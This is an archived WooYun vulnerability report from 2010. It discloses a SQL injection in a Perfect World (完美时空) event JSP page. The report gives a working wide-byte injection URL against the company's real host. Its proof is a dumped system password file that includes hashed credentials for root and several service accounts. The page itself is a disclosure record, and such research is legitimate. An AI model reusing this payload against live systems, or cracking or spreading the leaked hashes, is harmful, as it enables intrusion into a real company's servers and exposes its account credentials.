当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0700

漏洞标题:完美时空可以注入MYsql ROOT权限

相关厂商:完美时空

漏洞作者: 路人甲

提交时间:2010-10-15 23:12

修复时间:2010-11-15 00:00

公开时间:2010-11-15 00:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-10-15: 细节已通知厂商并且等待厂商处理中
2010-10-18: 厂商已经确认,细节仅向厂商公开
2010-10-28: 细节向核心白帽子及相关领域专家公开
2010-11-07: 细节向普通白帽子公开
2010-11-17: 细节向实习白帽子公开
2010-11-15: 细节向公众公开

简要描述:

完美时空SQL injection漏洞

详细说明:

通过些漏洞,可以注入获取数据库相关敏感信息。

漏洞证明:

利用方式:http://event3.wanmei.com/jsp/wlspanserverpk/winguess.jsp?server=632&winteam=Destroy%d8%bc'

获取系统相关信息:
root:$1$JsIu2E3a$yCLHEGlChJqifF1Ec9PzT0:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin login
daemon:*:2:2:daemon:/sbin:/sbin login
adm:*:3:4:adm: ar/adm:/sbin login
lp:*:4:7:lp: ar/spool/lpd:/sbin login
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail: ar/spool/mail:/sbin login
news:*:9:13:news:/etc/news:
uucp:*:10:14:uucp: ar/spool/uucp:/sbin login
operator:*:11:0:operator:/root:/sbin login
games:*:12:100:games:/usr/games:/sbin login
gopher:*:13:30:gopher: ar/gopher:/sbin login
ftp:*:14:50:FTP User: ar/ftp:/sbin/nologin
nobody:*:99:99:Nobody:/:/sbin login
vcsa:!!:69:69:virtual console memory owner:/dev:/sbin login
ntp:!!:38:38::/etc/ntp:/sbin login
rpc:!!:32:32:Portmapper RPC user:/:/sbin login
sshd:!!:74:74:Privilege-separated SSH: ar/empty/sshd:/sbin login
mysql:!!:500:500:MySQL server:/web/mysql:/bin/bash
web:$1$5zPWixq4$w/bW86UYHeWQAz3GUSQy2/:501:501::/web/JSPWeb:/sbin login
rsyncweb:$1$TU5dKsuC$zxS2v1spWzeGU19emoBoE.:502:502::/web/rsyncweb:/bin/bash
huodong:$1$o5hq2INm$h7NqTssNaTGnah4uhUjd8.:503:99::/web/www:/usr/local/ssh/bin/ssh-dummy-shell
#rsyncUPload:$1$F/JLHKcj$mM75KHgWw/77.CDcw5w.n.:504:504::/web/www/:/bin/bash

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2010-10-18 10:37

厂商回复:

谢谢提交漏洞,我们马上修补

最新状态:

暂无